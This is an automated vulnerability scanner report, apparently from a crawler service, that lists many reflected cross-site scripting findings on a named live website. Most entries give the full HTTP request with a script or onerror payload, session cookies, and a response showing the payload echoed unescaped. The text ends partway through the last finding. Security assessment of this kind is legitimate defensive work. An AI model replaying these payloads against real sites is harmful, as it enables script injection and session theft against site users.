Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d53b7<script>alert(1)</script>ab42275ebf4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesd53b7<script>alert(1)</script>ab42275ebf4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesd53b7<script>alert(1)</script>ab42275ebf4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.427. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32a93<script>alert(1)</script>3e7dee135b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/search.php32a93<script>alert(1)</script>3e7dee135b1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php32a93<script>alert(1)</script>3e7dee135b1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.428. http://www.resellerbase.com/adult/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 14da2<a>c70c7aeff12 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search14da2<a>c70c7aeff12&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search14da2<a>c70c7aeff12&opt=2 was not found on this server.</p>
...[SNIP]...

2.429. http://www.resellerbase.com/adult/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9bf46<a>f208d62ac66 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...9bf46<a>f208d62ac66&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...9bf46<a>f208d62ac66&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.430. http://www.resellerbase.com/adult/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c531<script>alert(1)</script>1894765ede4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2&2c531<script>alert(1)</script>1894765ede4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2&2c531<script>alert(1)</script>1894765ede4=1 was not found on this server.</p>
...[SNIP]...

2.431. http://www.resellerbase.com/adult/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 18bf9<a>e0737fe0a94 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=218bf9<a>e0737fe0a94 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/search.php?keyword=search...&Submit3=Search&opt=218bf9<a>e0737fe0a94 was not found on this server.</p>
...[SNIP]...

2.432. http://www.resellerbase.com/bad_link.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c5f1<script>alert(1)</script>24a5d16097b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bad_link.php6c5f1<script>alert(1)</script>24a5d16097b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/robots.txt
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.php6c5f1<script>alert(1)</script>24a5d16097b was not found on this server.</p>
...[SNIP]...

2.433. http://www.resellerbase.com/bad_link.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6cfc<script>alert(1)</script>d6f55003dc1f41067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.phpb6cfc<script>alert(1)</script>d6f55003dc1f41067?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.phpb6cfc<script>alert(1)</script>d6f55003dc1f41067?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener was not found on this server.</p>
...[SNIP]...

2.434. http://www.resellerbase.com/bad_link.php [r_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The value of the r_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d1a"><img%20src%3da%20onerror%3dalert(1)>945e9dc3eb2d09acd was submitted in the r_email parameter. This input was echoed as c2d1a\"><img src=a onerror=alert(1)>945e9dc3eb2d09acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.php?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.comc2d1a"><img%20src%3da%20onerror%3dalert(1)>945e9dc3eb2d09acd&submit=Send+Report&type=2&r_name=Peter+Wiener HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<input class="text3" type="text" name="r_email" size="30" value="wiener@example.comc2d1a\"><img src=a onerror=alert(1)>945e9dc3eb2d09acd" />
...[SNIP]...

2.435. http://www.resellerbase.com/bad_link.php [r_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The value of the r_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fd4"><img%20src%3da%20onerror%3dalert(1)>cedfdee5b9d463d60 was submitted in the r_name parameter. This input was echoed as 91fd4"><img src=a onerror=alert(1)>cedfdee5b9d463d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /bad_link.php?id=&captcha_key=555-555-0199@example.com&pflag=bad_link&r_email=wiener@example.com&submit=Send+Report&type=2&r_name=Peter+Wiener91fd4"><img%20src%3da%20onerror%3dalert(1)>cedfdee5b9d463d60 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/bad_link.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<input class="text3" type="text" name="r_name" size="30" value="Peter Wiener91fd4"><img src=a onerror=alert(1)>cedfdee5b9d463d60" />
...[SNIP]...

2.436. http://www.resellerbase.com/bad_link.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7bf7<script>alert(1)</script>77759ad7874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bad_link.phpc7bf7<script>alert(1)</script>77759ad7874/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /bad_link.phpc7bf7<script>alert(1)</script>77759ad7874/ was not found on this server.</p>
...[SNIP]...

2.437. http://www.resellerbase.com/become_editor.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /become_editor.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 218df<script>alert(1)</script>4b175e4229c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /become_editor.php218df<script>alert(1)</script>4b175e4229c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /become_editor.php218df<script>alert(1)</script>4b175e4229c was not found on this server.</p>
...[SNIP]...

2.438. http://www.resellerbase.com/become_editor.php [cat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /become_editor.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ffe"><a>d0bf1d1ae1f was submitted in the cat parameter. This input was echoed as d9ffe\"><a>d0bf1d1ae1f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_editor.php?cat=13d9ffe"><a>d0bf1d1ae1f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/become_editor.php?cat=13d9ffe\"><a>d0bf1d1ae1f" />
...[SNIP]...

2.439. http://www.resellerbase.com/become_editor.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /become_editor.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb00c"><a>fe1fbc85db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb00c\"><a>fe1fbc85db5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_editor.php?eb00c"><a>fe1fbc85db5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/become_editor.php?eb00c\"><a>fe1fbc85db5=1" />
...[SNIP]...

2.440. http://www.resellerbase.com/blocks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /blocks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28d32<script>alert(1)</script>4da8eff9e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocks28d32<script>alert(1)</script>4da8eff9e11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocks28d32<script>alert(1)</script>4da8eff9e11/ was not found on this server.</p>
...[SNIP]...

2.441. http://www.resellerbase.com/blocks/block.login.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /blocks/block.login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be6a7<script>alert(1)</script>3974595fe99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocksbe6a7<script>alert(1)</script>3974595fe99/block.login.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocksbe6a7<script>alert(1)</script>3974595fe99/block.login.php was not found on this server.</p>
...[SNIP]...

2.442. http://www.resellerbase.com/blocks/block.whos_online.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /blocks/block.whos_online.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16ddc<script>alert(1)</script>3353187f5e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blocks16ddc<script>alert(1)</script>3353187f5e5/block.whos_online.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /blocks16ddc<script>alert(1)</script>3353187f5e5/block.whos_online.php was not found on this server.</p>
...[SNIP]...

2.443. http://www.resellerbase.com/browsepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b098<script>alert(1)</script>091f0a5fd40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browsepr.php6b098<script>alert(1)</script>091f0a5fd40?pr=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /browsepr.php6b098<script>alert(1)</script>091f0a5fd40?pr=8 was not found on this server.</p>
...[SNIP]...

2.444. http://www.resellerbase.com/browsepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c50d<script>alert(1)</script>ce0c6152c85a330f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php7c50d<script>alert(1)</script>ce0c6152c85a330f6?pr=5&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
